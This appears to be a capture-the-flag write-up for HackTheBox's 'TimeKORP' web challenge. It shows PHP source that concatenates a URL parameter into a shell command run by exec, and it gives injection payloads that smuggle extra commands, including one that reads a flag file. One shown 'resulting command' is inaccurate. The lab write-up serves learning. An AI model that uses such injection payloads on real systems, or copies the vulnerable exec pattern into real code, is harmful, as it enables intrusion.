TimeKORP

• 🌐 Website: HackTheBox
• 🔥 Level: Very Easy
• 📚 Category: Web
• 🔗 Link: TimeKORP

📜 Description¶

Are you ready to uncover the mysteries and expose the truth hidden within KROP’s digital domain? Join the challenge and prove your skills in the world of cybersecurity. Remember, time is money, but in this case the rewards may be much greater than you imagine.

📋 Walkthrough¶

The site looks very simple: it shows the current time.

We notice that the URL has this structure:

http://94.237.57.211:43954/?format=%H:%M:%S

There is also another page with a similar format:

http://94.237.57.211:43954/?format=%Y-%m-%d

By changing the format parameter, the content is reflected on the webpage.

Let’s take a look at the source code:

public function index($router)
{
    $format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S';
    $time = new TimeModel($format);
    return $router->view('index', ['time' => $time->getTime()]);
}

If the format parameter is not provided, it defaults to %H:%M:%S. Now let’s see how getTime() is implemented:

public function __construct($format)
{
    $this->command = "date '+" . $format . "' 2>&1";
}

public function getTime()
{
    $time = exec($this->command);
    $res  = isset($time) ? $time : '?';
    return $res;
}

The value of format is concatenated into a shell command that is then executed by exec. A full example command looks like this:

date +'%H:%M:%S' 2>&1;

The trick is to concatenate additional commands to the base one. Let’s try with a simple echo:

%H:%M:%S'; echo 'hello

The resulting command becomes:

date +'%H:%M:%S' echo 'hello' 2>&1;

And indeed the page returns “hello”:

<span class='text-muted'>It's</span> hello<span class='text-muted'>.</span>

Now we can simply read the flag with cat /flag using the payload:

'; cat '/flag